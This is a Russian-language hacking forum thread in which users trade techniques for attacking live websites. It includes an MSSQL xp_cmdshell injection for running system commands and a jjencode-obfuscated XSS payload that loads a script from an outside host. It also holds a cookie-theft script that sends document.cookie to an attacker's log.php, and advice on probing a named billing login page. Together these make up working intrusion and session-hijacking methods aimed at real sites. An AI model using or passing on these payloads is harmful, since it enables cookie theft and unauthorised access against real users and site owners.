таблицу лучше создавать с полем id, чтобы было удобнее выводить результат: CREATE TABLE temp (id int IDENTITY, text nvarchar(8000)); INSERT INTO temp exec master..xp_cmdshell dir; SELECT text FROM temp WHERE id = 1
Что за ошибка такая ? type Exception report message description The server encountered an internal error () that prevented it from fulfilling this request. exception java.lang.NumberFormatException: For input string: "58'" java.lang.NumberFormatException.forInputString(NumberFormatException.java:48) java.lang.Integer.parseInt(Integer.java:456) java.lang.Integer.parseInt(Integer.java:497) javax.servlet.http.HttpServlet.service(HttpServlet.java:627) javax.servlet.http.HttpServlet.service(HttpServlet.java:729) com.evalica.util.http.upload.MultipartRequestFilter.doFilter(MultipartRequestFilter.java:28) com.evalica.cm.core.session.SessionCookieFilter.doFilter(SessionCookieFilter.java:47) note The full stack trace of the root cause is available in the Apache Tomcat/5.5.27 logs. Ошибка базы или сервера ?
Ошибка ява-приложения. java.lang.NumberFormatException: For input string: "58'" Фактически сервер говорит, что переданная мне строка - не число.
http://ru.wikipedia.org/wiki/ODBC - от туда и надпись Microsoft А БД там MySQL. Ты так и не научился что либо читать, а по прежнему уверено отвечаешь на вопросы, которые сам не понимаешь.
Ситуация в том что я нашел xss но при попытке засунуть ей вот этот скрипт PHP: <SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT> Нечего не происходит так как у него фильтр на " и %22 его аналог фильтр заключается в том что перед ним он ставит знак \ а именно PHP: <SCRIPT type=\"text/javascript\" src=\"http://your_site.com/js.js\"></SCRIPT> Его можно как нибудь обойти или это все? просто когда пишешь PHP: <script>alert(document.cookie)</script> Все показывает.
2xofffff Попробуй так: Code: <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script> Это закодированое Code: <script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script> UPD: Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание. Это к стати работает!
не понял что ты имел ввиду под красным!!! Это чем же закодировано? Можно ли потом чтоб обйти двойные кавычки закодироват еще чем нибудь (hex, base64)?
2YuNi|[c, если ты закодируешь это потом в бейс64 или хэкс - то вообще ничего пахать не будет. Инфа по сабжу: http://raz0r.name/news/xss-filters-bypass-on-blackhat/ http://oxod.ru/2009/08/26/%D0%BE%D0%B1%D1%85%D0%BE%D0%B4-xss-%D1%84%D0%B8%D0%BB%D1%8C%D1%82%D1%80%D0%BE%D0%B2-%D0%BF%D0%BE-%D1%81%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B2%D0%B0%D0%BC-%D0%BE%D1%81%D0%BE%D0%B1%D0%B5%D0%BD%D0%BE%D1%81/ http://utf-8.jp/public/jjencode.html
No input file specified. Написало когда ввел Code: ?username='><SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT></script> и куки написались в строке браузера но в base.php не сохранились В js.js у меня PHP: location.href =www.site.h16.ru/cb/log.php? + document.cookie; Кстати еще в строке браузера после того как я написал скрипт перешел на страничку слова No input file specified. Code: http://hacksite.com/log.php?и тут cookie
http://bill.svtc.ru/initlogin.php?CardNumber=1&CardCode=' Помогите, незнаю как обойти количество символов Заранее спасибо
В сурсе страницы рядом с name=CardCode изменяешь maxlength=12 на maxlength=999999. Только тольку с этого...
